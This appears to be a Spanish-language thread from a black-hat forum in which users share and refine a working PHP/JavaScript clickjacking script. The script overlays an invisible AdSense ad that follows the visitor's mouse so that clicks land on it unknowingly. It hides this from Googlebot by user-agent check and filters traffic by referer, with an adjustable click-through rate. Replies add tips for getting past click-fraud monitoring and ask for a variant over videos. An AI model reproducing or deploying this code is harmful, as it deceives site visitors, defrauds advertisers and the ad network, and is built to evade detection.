• 18 voto(s) - 4.78 Media
  • 5
  • 4
  • 3
  • 2
  • 1
Modos de tema

Codigo ocultar anuncios adsense
Exkanon Offline
Desarrollador Web
*******
Administrators

Mensajes: 746
Temas: 55
Registro en: Dec 2015
Reputación: 57
Gracias: 3
379 Gracias recividas en 27 post(s)
este codigo hace que el anuncio sea invisible y siga al mouse.
tiene un filtro que hace que solo funcione a visitantes que solo vengan de facebook.com ,  bien lo puedes modificar a tu gusto.
tambien tiene un control de CTR que puedes modificar a tu gusto.
Necesitas estar registrado para ver estoSolo los usuarios registrados pueden ver el contenido. - Porfavor y da "Gracias" al post para ver su contenido.
Porque aún falta mucho por recorrer. 

Lae13 Offline

BlackHaters

Mensajes: 4
Temas: 0
Registro en: Feb 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
Esto es importante, alguien tiene idea de si funciona con fb ads?

Otra duda, cual es la diferencia de este a otros plugins que venden? todos no cumplen la misma funcion? y que ademas posiblemente sea con el mismo codigo? Es que veo demasiados plugins a la venta y al final todos como que terminan haciendo lo mismo, uno no es mas indetectable que otro a mi parecer o si?

signal Offline

BlackHaters

Mensajes: 4
Temas: 0
Registro en: Mar 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
(12-30-2015, 05:12 PM)Exkanon escribió:
(12-30-2015, 04:53 PM)CsarAxl escribió: @Exkanon mi pregunta se instala como el autolike? osea en  se crea el archivo .js y luego le conecta en un widget?

no, simplemente pegas el codigo directamente donde lo vallas a utilizar si lo quieres utilizar necesitarás un plugin, para postear php en wordpress.

https://wordpress.org/plugins/insert-php-code-snippet/
tem algum vídeo tutorial ensinando como colocar o código ads no scripyt

signal Offline

BlackHaters

Mensajes: 4
Temas: 0
Registro en: Mar 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
(12-27-2015, 02:50 PM)Exkanon escribió: este codigo hace que el anuncio sea invisible y siga al mouse.
tiene un filtro que hace que solo funcione a visitantes que solo vengan de facebook.com ,  bien lo puedes modificar a tu gusto.
tambien tiene un control de CTR que puedes modificar a tu gusto.


en el vídeo me di cuenta de que el código es diferente de éste. éste se comparte comienza en < ? php

$ Referer = $ _SERVER [ ' HTTP_REFERER '] ;
ya que el vídeo comienza en
is_bot funcion ( ) o algo así, no prara ver a la derecha en el vídeo

jackmaster Offline
jackmaster
BlackHaters

Mensajes: 11
Temas: 0
Registro en: Mar 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
Hola, este codigo me funciona excelente !! MUCHAS GRACIAS !!!!!!

robin69 Offline

BlackHaters

Mensajes: 6
Temas: 0
Registro en: Mar 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
it's not working for me any solution

robin69 Offline

BlackHaters

Mensajes: 6
Temas: 0
Registro en: Mar 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
how to add multiple referers?

fliperipe Offline

BlackHaters

Mensajes: 3
Temas: 0
Registro en: Apr 2016
Reputación: 0
Gracias: 3
0 Gracias recividas en 0 post(s)
(04-04-2016, 01:10 AM)robin69 escribió: how to add multiple referers?

Você pode usar assim:

Código PHP:
if ($referer=='facebook.com' or $referer=='twitter.com') {
$ref="si";


(12-27-2015, 02:50 PM)Exkanon escribió: este codigo hace que el anuncio sea invisible y siga al mouse.
tiene un filtro que hace que solo funcione a visitantes que solo vengan de facebook.com ,  bien lo puedes modificar a tu gusto.
tambien tiene un control de CTR que puedes modificar a tu gusto.

Olá amigo,

Você pode substituir esta parte:

Código PHP:
$referer $_SERVER['HTTP_REFERER'];
$referer=str_replace("http://"""$referer);
$referer=str_replace("https://"""$referer);
$referer=str_replace("www."""$referer);
$pieces2 explode("/"$referer);
$referer=$pieces2[0];

if(
$referer=='facebook.com' or $referer=='twitter.com') {
$ref="si";


Por isto:

Código PHP:
$referer $_SERVER['HTTP_REFERER'];

if (
strpos($referer'facebook') !== false) {
$ref "si";


mutant Offline

BlackHaters

Mensajes: 5
Temas: 0
Registro en: Apr 2016
Reputación: 0
Gracias: 9
0 Gracias recividas en 0 post(s)
(03-09-2016, 05:18 PM)phenomeno escribió: @aleksyntek


bueno...intentare no hacerme un lio con mis explicaciones...

primero de todo:apenas se php y blackhat ni whitehack ni muchas mas cosas,voy aprendiendo leyendo,releyendo,probando y volviendo a probar,alguna vez tambien pregunto Wink

Plugin click fraud:por fin me he dado cuenta...,he logrado entender que mi punto de vista estaba equivocado,el plugin esta hecho para algo que no tiene que ver con el codigo,su uso era otro especifico,lo que esta haciendo es servirnos de apoyo con el codigo que introducimos..
El plugin esta creado para bloquear ips que hacen constante click en nuestros anuncios,...(bots,gente aburrida,etc...) que genera clicks invalidos con lo que adsense nos da penalizaciones...
El plugin monitoriza uno o varios anuncios y cuando se hace click en uno bloquea la ip para que no cuenten mas clicks,(X nº de clicks,durante X tiempo)
¿porque no me detecta el ad?,...si ponemos este codigo:

<div class="cfmonitor"><script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- Nombre anuncio -->
<ins class="adsbygoogle"
    style="display:inline-block;width:336px;height:280px"
    data-ad-client="ca-pub-xxxxxxxxxxxxxxxxxxx"
    data-ad-slot="xxxxxxxxxxxxxxx"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script></div>


ya sea en el head,footer,single,widget de html...etc,nos detecta el ad,perooooo,tambien lo muestra en pantalla y estatico...algo que no queremos.
POR ESO NO PODEMOS PONER ESE CODIGO Y QUE EL FRAUD NOS DE LUZ VERDE

ahora intentare partir en dos explicaciones lo siguiente:


<?php
function is_bot(){
   $bots = array('Googlebot', 'googlebot');

  foreach($bots as $b){
      if( stripos( $_SERVER['HTTP_USER_AGENT'], $b ) !== false ) return true;
   }
  return false;
}

if(is_bot()){

}else

$referer = $_SERVER['HTTP_REFERER'];
$referer=str_replace("http://", "", $referer);
$referer=str_replace("https://", "", $referer);
$referer=str_replace("www.", "", $referer);
$pieces2 = explode("/", $referer);
$referer=$pieces2[0];

$ref="si";

if(($ref=="si")) {


$ctr =80;
if (rand (0,100) <= $ctr)
{
$control="si";
}
else {
$control="no";
}
      }
if(($ref=="si") && ($control=="si") ) {
echo "<style type=\"text/css\">
#clickjack
{
background-color: rgb(0,0,255); opacity: 0;
height: auto;
width: auto;
position: absolute;
top: 50;
left: 50;
border-bottom: 1px #76e042 solid;
border-bottom: 0px blue solid;
color: #ffffff;
padding: 0px;
z-index: 1001;
font-size: 13px;
}
</style>";
echo "<div id=\"clickjack\">";
echo "<a href=\"#\" onclick=\"getValue()\">\n";
echo "</a>\n";
echo "<div class='cfmonitor'>\n";
echo "<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\n";
echo "<!-- nombre   -->\n";
echo "<ins class=\"adsbygoogle\"\n";
echo "style=\"display:inline-block;width:336px;height:280px\"\n";
echo "data-ad-client=\"ca-pub-xxxxxxxxxxxxxxxxxxx\"\n";
echo "data-ad-slot=\"xxxxxxxxxxxx\"></ins>\n";
echo "<script>\n";
echo "(adsbygoogle = window.adsbygoogle || []).push({});\n";
echo "</script>\n";
echo "</div>";
echo "<script type=\"text/javascript\">\n";
echo "var div = document.getElementById('clickjack');\n";
echo "document.addEventListener('mousemove',function(e) { \n";
echo "div.style.left = e.pageX -220 +\"px\";\n";
echo "div.style.top = e.pageY -160 +\"px\";\n";
echo "});\n";
echo "</script>\n";
echo "</div>";
}
?>


este primer trozo de codigo:

function is_bot(){
   $bots = array('Googlebot', 'googlebot');

  foreach($bots as $b){
      if( stripos( $_SERVER['HTTP_USER_AGENT'], $b ) !== false ) return true;
   }
  return false;
}

if(is_bot()){

}else

lo que hace es ocultar el contenido que le sigue,
si lo añado en php snippet,no funciona correctamente el codigo completo,si no lo añado es visible el codigo para google...no creo que necesita mas aclaracion...

la segunda parte:

$referer = $_SERVER['HTTP_REFERER'];
$referer=str_replace("http://", "", $referer);
$referer=str_replace("https://", "", $referer);
$referer=str_replace("www.", "", $referer);
$pieces2 = explode("/", $referer);
$referer=$pieces2[0];

$ref="si";

if(($ref=="si")) {


$ctr =80;
if (rand (0,100) <= $ctr)
{
$control="si";
}
else {
$control="no";
}
      }
if(($ref=="si") && ($control=="si") ) {
echo "<style type=\"text/css\">
#clickjack
{
background-color: rgb(0,0,255); opacity: 0;
height: auto;
width: auto;
position: absolute;
top: 50;
left: 50;
border-bottom: 1px #76e042 solid;
border-bottom: 0px blue solid;
color: #ffffff;
padding: 0px;
z-index: 1001;
font-size: 13px;
}
</style>";
echo "<div id=\"clickjack\">";
echo "<a href=\"#\" onclick=\"getValue()\">\n";
echo "</a>\n";
echo "<div class='cfmonitor'>\n";
echo "<script async src=\"//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js\"></script>\n";
echo "<!-- nombre   -->\n";
echo "<ins class=\"adsbygoogle\"\n";
echo "style=\"display:inline-block;width:336px;height:280px\"\n";
echo "data-ad-client=\"ca-pub-xxxxxxxxxxxxxxxxxxx\"\n";
echo "data-ad-slot=\"xxxxxxxxxxxx\"></ins>\n";
echo "<script>\n";
echo "(adsbygoogle = window.adsbygoogle || []).push({});\n";
echo "</script>\n";
echo "</div>";
echo "<script type=\"text/javascript\">\n";
echo "var div = document.getElementById('clickjack');\n";
echo "document.addEventListener('mousemove',function(e) { \n";
echo "div.style.left = e.pageX -220 +\"px\";\n";
echo "div.style.top = e.pageY -160 +\"px\";\n";
echo "});\n";
echo "</script>\n";
echo "</div>";
}

ya se ha hablado mucho sobre este codigo,lo unico que voy a aclarar es sobre los refers,ya veis que no he puesto ninguno,quiero que sea de donde sea el trafico que venga que funcione el script,por eso solo tengo esta linea

$ref="si";

en vez de la de refer de twiter,facebook u otra....

tips...
aseguraros que el class='cfmonitor' (o el que tengais puesto),coincide en click fraud,php snippet,el codigo,y el shortcode que añadais al post o pagina.
los temas instalados influyen...y mucho...tendreis que probar y probar...
utilizando el php snippet,al cargar la pagina,el cursor muestra la forma del dedo para hacer click,introduciendo el codigo a mano en single o head...se muestra el cursor de manera normal en forma de flecha...
actualmente,tengo el codigo completo metido a mano en single,click fraud funcionando(sin detectar ad,pero grabando ips),y el php snippet desactivado.
la version de php que utilizo en el servidor tambien me ha influido,he probado 5.6/5.5/5.4  y 5.4 es la que mejor me funciona.


espero haber ayudado...un saludo


gracias por códido

PCSolucionesrd1 Offline

BlackHaters

Mensajes: 56
Temas: 0
Registro en: Apr 2016
Reputación: 2
Gracias: 0
0 Gracias recividas en 0 post(s)
Muy bien explicado. Gracias! ahora a probar

jesuslugo Offline

BlackHaters

Mensajes: 29
Temas: 2
Registro en: Mar 2016
Reputación: 0
Gracias: 0
0 Gracias recividas en 0 post(s)
(12-27-2015, 02:50 PM)Exkanon escribió: este codigo hace que el anuncio sea invisible y siga al mouse.
tiene un filtro que hace que solo funcione a visitantes que solo vengan de facebook.com ,  bien lo puedes modificar a tu gusto.
tambien tiene un control de CTR que puedes modificar a tu gusto.

Bro ¿tienes una variacion de este codigo el cual se pueda colocar sobre un video?


Posibles temas similares...
Tema / Autor Respuestas / Vistas Último mensaje
5 Replies 1,086 Views
Último mensaje by zykox
03-22-2017, 05:12 AM
2 Replies 139 Views
Último mensaje by Usuario Inner
03-19-2017, 05:20 PM
3 Replies 546 Views
Último mensaje by akanz
03-16-2017, 12:51 PM
18 Replies 3,972 Views
Último mensaje by hackpot
03-08-2017, 02:41 PM
89 Replies 10,895 Views
Último mensaje by Icert
03-05-2017, 12:45 AM
4 Replies 717 Views
Último mensaje by kaizo
02-22-2017, 04:59 AM
1 Replies 264 Views
Último mensaje by treyfas
01-10-2017, 06:29 PM




Usuarios navegando en este tema: 1 invitado(s)